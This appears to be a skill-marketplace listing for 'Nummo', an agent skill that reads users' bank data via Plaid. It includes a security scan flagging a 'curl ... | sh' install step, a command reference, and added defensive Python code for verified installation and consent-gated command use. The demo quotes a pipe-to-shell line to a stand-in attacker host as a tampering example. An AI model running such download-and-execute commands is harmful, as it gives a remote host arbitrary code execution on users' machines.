Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Nummo

v0.1.8

Nummo connects AI agents to the user's bank accounts via Plaid, enabling financial insights through natural language. More info at nummo.ai.

Security Scan
VirusTotal: Suspicious
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
The name, description, and listed CLI commands (auth, accounts, txs, summary, subscription flows) are coherent with a Plaid-backed banking insights skill. There are no unrelated binaries or environment variables requested that would contradict the stated purpose.
Instruction Scope
SKILL.md stays on-topic: it instructs the agent to request explicit user permission, to present Plaid/Stripe URLs for the user to open in a browser, and to use specific commands for account and transaction queries. The instructions do not direct the agent to read unrelated system files or to exfiltrate data to unexpected endpoints.
Install Mechanism
Although the skill itself is instruction-only, reference/install.md tells users to run `curl -fsSL https://nummo.ai/install | sh`. That is a high-risk pattern (download-and-execute from a remote host): even when the domain matches the project, piping an unreviewed remote script into sh hands whoever controls that host arbitrary code execution on the user's machine, and the user never sees the script before it runs. It is disproportionate as an install instruction when no install spec, published checksum or verified release host accompanies it.
Credentials
The skill declares no required environment variables or credentials, which is consistent with a flow that uses Plaid Link and magic-link auth (both browser-based). However, once a user connects accounts the skill has access to highly sensitive financial data, so the absence of declared credentials does not eliminate privacy/security risk: verify how and where data is stored and transmitted, and where the CLI keeps the session it obtains after the magic-link login (the `auth status` command reports a session expiry, so one exists).
Persistence & Privilege
The skill does not request 'always' or other elevated platform privileges; it is user-invocable and relies on explicit user consent per the guidelines in SKILL.md.
What to consider before installing
This skill appears to do what it claims (connecting to banks via Plaid and providing summaries/transactions). However, do NOT run the suggested `curl ... | sh` install command without verification: piping a remote script to the shell executes arbitrary code from the site, and nothing is reviewed before it runs.

Before installing or using the CLI, verify the publisher (nummo.ai), check for an official release page or signed installer, and review the install script contents after downloading it to a file rather than piping it. Ask the vendor for a reproducible, auditable install method (e.g. a package on a well-known registry, or a downloadable release with published checksums).

Also confirm the privacy/security details: where transaction data is stored, who can access it, the retention policy, and whether the agent or third parties can access raw data. For safer operation, stay with the browser-based Plaid Link flow (the skill's own access to your accounts is read-only) and ensure the agent asks for explicit permission before invoking any command that touches your financial data.
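The safer install flow recommended in the Install Mechanism finding and in the paragraphs above, as an added example (this is not Nummo's installer or any code from the project): save the script to a file, compare its SHA-256 against a digest obtained out of band, re-check the file immediately before execution, and only then run it with an explicit interpreter. `PINNED_SHA256` is a placeholder; the vendor would have to publish the real digest somewhere other than the host that serves the script, otherwise a compromise of that host defeats the check. The demo at the bottom uses a constructed stand-in script so it runs offline.

```python
"""Download-then-verify alternative to `curl ... | sh`.

Added example, not part of the Nummo skill. The pinned digest below is a
placeholder (assumption); take the real one from a vendor release page.
"""
import hashlib
import hmac
import os
import subprocess
import tempfile
import urllib.request
from typing import Optional

INSTALL_URL = "https://nummo.ai/install"   # URL from reference/install.md
PINNED_SHA256 = "0" * 64                    # PLACEHOLDER: vendor-published digest goes here


class VerificationError(Exception):
    pass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def digest_matches(data: bytes, expected_hex: str) -> bool:
    """Constant-time comparison of the computed digest with the pinned one."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def fetch(url: str, timeout: int = 30) -> bytes:
    """Read the whole script body into memory; it is never streamed into a shell."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def stage_installer(data: bytes, expected_hex: str, directory: Optional[str] = None) -> str:
    """Write the script to a private temp file only if its digest matches. Returns the path."""
    if not digest_matches(data, expected_hex):
        raise VerificationError(
            f"installer digest {sha256_hex(data)} does not match pinned {expected_hex}")
    fd, path = tempfile.mkstemp(prefix="nummo-install-", suffix=".sh", dir=directory)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    os.chmod(path, 0o600)
    return path


def run_staged(path: str, expected_hex: str) -> int:
    """Re-verify the on-disk file right before running it (guards against a swap
    between review and execution), then execute with an explicit interpreter."""
    with open(path, "rb") as fh:
        data = fh.read()
    if not digest_matches(data, expected_hex):
        raise VerificationError("staged installer changed on disk; refusing to run")
    return subprocess.run(["sh", path], check=False).returncode


if __name__ == "__main__":
    # Constructed stand-in for the remote script so the demo runs offline.
    sample = b"#!/bin/sh\necho 'pretend to install nummo'\n"
    pinned = sha256_hex(sample)   # in real use this comes from the vendor, not from the download
    staged = stage_installer(sample, pinned)
    print("staged at", staged, "exit", run_staged(staged, pinned))
    tampered = sample + b"curl http://attacker.example/x | sh\n"
    try:
        stage_installer(tampered, pinned)
    except VerificationError as e:
        print("rejected:", e)
    # Real flow once a digest is published:
    #   run_staged(stage_installer(fetch(INSTALL_URL), PINNED_SHA256), PINNED_SHA256)
```

Between `stage_installer` and `run_staged` is where the human review belongs: open the staged file, read it, and only then call `run_staged`, which refuses to execute if the file no longer matches what was reviewed.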

Like a lobster shell, security has layers — review code before you run it.

Latest version id: vk970kcbgm94sc8ktk0wjvym3jx823cmr · 388 downloads · 0 stars · 3 versions · updated 6h ago · v0.1.8 · license: MIT-0

Commands

Authentication

`nummo auth signup <email>` Creates a new Nummo account and sends a magic link to the provided email. Use when the user wants to get started or is not yet authenticated.

`nummo auth status` Checks whether the user is authenticated and shows their email and session expiry. Use to verify setup before running other commands.

Accounts

`nummo accounts connect` Starts the bank connection flow and returns a Plaid Link URL. Share the URL with the user — they must open it in a browser to connect their bank. Use when the user wants to add a bank account.

`nummo accounts list` Lists all connected bank accounts grouped by institution, with account name and last 4 digits. Use to show the user what banks are connected, or to verify a connection was successful.

`nummo accounts txs [--from YYYY-MM-DD] [--to YYYY-MM-DD] [--all]` Returns individual transactions with date, merchant, amount, account, and category. Default range: last 7 days. Use --all to fetch all available history. Amounts: + = income, - = spending. Use for: finding specific transactions, merchant lookups, category drill-downs, recent activity.

`nummo accounts summary [--from YYYY-MM-DD] [--to YYYY-MM-DD]` Returns total income and spending, broken down by category and subcategory. Default range: last 30 days. Use for: spending overviews, budget questions, monthly recaps, "how much did I spend on X".

Subscription

`nummo sub tiers` Lists available subscription plans with pricing, billing interval, account limits, and transaction history access.

`nummo sub me` Shows the user's current plan, status, trial end date or next billing date. Use to check subscription status or when the user asks about their plan.

`nummo sub checkout <tier>` Creates a Stripe checkout session for trial users and returns a payment URL. Share the URL with the user — they must open it in a browser to complete the purchase. Valid tiers: pro_monthly, pro_yearly, max_monthly, max_yearly. Use `nummo sub tiers` first if the user is unsure which plan to choose.

`nummo sub change <tier>` Same as checkout but for users who are already subscribed and want to change plans.

`nummo sub cancel` Informs the user how to cancel their subscription.


Guidelines

  • Always ask for permission before calling any tool. This skill gives you read access to financial data, and you must get explicit consent from the user.
  • If no date range is mentioned, use the command defaults — don't ask the user for dates.
  • Use summary by default when the user asks broad questions about their finances.
  • Use txs for specific lookups or drill-downs.
  • When a command returns a URL (connect, checkout, change), always present it clearly and tell the user to open it in their browser.
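The guidelines above are prompt-level instructions to the agent; the check below is an added example (not part of the Nummo skill or any agent runtime) of enforcing the same rules in the harness that spawns the CLI, using the command table on this page as an allowlist. Only the documented subcommands pass, `--from`/`--to` must be well-formed and ordered dates, tiers must be one of the four listed, the email check is a loose sanity pattern (assumption, not RFC validation), nothing is built without a consent record scoped to that exact command, and the result is an argv list so no shell ever parses the arguments. `Consent` and `PolicyViolation` are names invented here.

```python
"""Consent-gated, allowlisted wrapper around the documented nummo commands.
Added example; not the skill's own code. Consent, PolicyViolation, check and
build_argv are hypothetical names for an agent harness."""
import re
import subprocess
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional, Sequence

VALID_TIERS = {"pro_monthly", "pro_yearly", "max_monthly", "max_yearly"}
DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")   # assumption: loose sanity check only

# Documented command set from the Commands section. "returns_url" marks the
# commands whose output the agent must present to the user to open in a browser.
COMMANDS: Dict[tuple, dict] = {
    ("auth", "signup"):      {"positional": "email", "returns_url": False},
    ("auth", "status"):      {"positional": None, "returns_url": False},
    ("accounts", "connect"): {"positional": None, "returns_url": True},
    ("accounts", "list"):    {"positional": None, "returns_url": False},
    ("accounts", "txs"):     {"positional": None, "returns_url": False, "flags": {"--from", "--to", "--all"}},
    ("accounts", "summary"): {"positional": None, "returns_url": False, "flags": {"--from", "--to"}},
    ("sub", "tiers"):        {"positional": None, "returns_url": False},
    ("sub", "me"):           {"positional": None, "returns_url": False},
    ("sub", "checkout"):     {"positional": "tier", "returns_url": True},
    ("sub", "change"):       {"positional": "tier", "returns_url": True},
    ("sub", "cancel"):       {"positional": None, "returns_url": False},
}


class PolicyViolation(Exception):
    pass


@dataclass
class Consent:
    """The user's explicit yes for one specific command (guideline: ask before every call)."""
    granted: bool
    for_command: str   # e.g. "accounts txs"


def _parse_date(s: str) -> date:
    if not DATE_RE.match(s):
        raise PolicyViolation(f"bad date {s!r}; expected YYYY-MM-DD")
    try:
        return date.fromisoformat(s)
    except ValueError as e:
        raise PolicyViolation(f"bad date {s!r}: {e}")


def build_argv(args: Sequence[str], consent: Optional[Consent]) -> List[str]:
    """Validate an agent-proposed invocation and return the argv list to spawn."""
    if len(args) < 2:
        raise PolicyViolation("need <group> <subcommand>")
    key = (args[0], args[1])
    spec = COMMANDS.get(key)
    if spec is None:
        raise PolicyViolation(f"{' '.join(args[:2])!r} is not a documented nummo command")
    name = f"{key[0]} {key[1]}"
    if consent is None or not consent.granted or consent.for_command != name:
        raise PolicyViolation(f"no explicit user consent recorded for {name!r}")
    rest, out = list(args[2:]), ["nummo", key[0], key[1]]
    if spec["positional"]:
        if len(rest) != 1:
            raise PolicyViolation(f"{name} takes exactly one <{spec['positional']}>")
        value = rest[0]
        if spec["positional"] == "tier" and value not in VALID_TIERS:
            raise PolicyViolation(f"unknown tier {value!r}; valid: {sorted(VALID_TIERS)}")
        if spec["positional"] == "email" and not EMAIL_RE.match(value):
            raise PolicyViolation(f"{value!r} does not look like an email")
        return out + [value]
    allowed, dates, i = spec.get("flags", set()), {}, 0
    while i < len(rest):
        flag = rest[i]
        if flag not in allowed:
            raise PolicyViolation(f"{flag!r} not allowed for {name}")
        if flag == "--all":
            out.append(flag); i += 1; continue
        if i + 1 >= len(rest):
            raise PolicyViolation(f"{flag} needs a YYYY-MM-DD value")
        dates[flag] = _parse_date(rest[i + 1])
        out += [flag, rest[i + 1]]; i += 2
    if "--from" in dates and "--to" in dates and dates["--from"] > dates["--to"]:
        raise PolicyViolation("--from is after --to")
    return out


def check(args: Sequence[str], consent: Optional[Consent]) -> Optional[str]:
    """None if the call is allowed, otherwise the reason to show the user."""
    try:
        build_argv(args, consent)
        return None
    except PolicyViolation as e:
        return str(e)


def returns_url(args: Sequence[str]) -> bool:
    return len(args) >= 2 and COMMANDS.get((args[0], args[1]), {}).get("returns_url", False)


def run(args: Sequence[str], consent: Optional[Consent]) -> subprocess.CompletedProcess:
    """Spawn the validated argv directly, never through a shell, and capture output for the agent."""
    return subprocess.run(build_argv(args, consent), capture_output=True, text=True, check=False)
```

`check` is what the harness calls when the agent proposes a tool call; a non-None result is surfaced to the user instead of being executed. When `returns_url` is true for the call, the harness knows the command's output is a link the user must open themselves, matching the last guideline.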
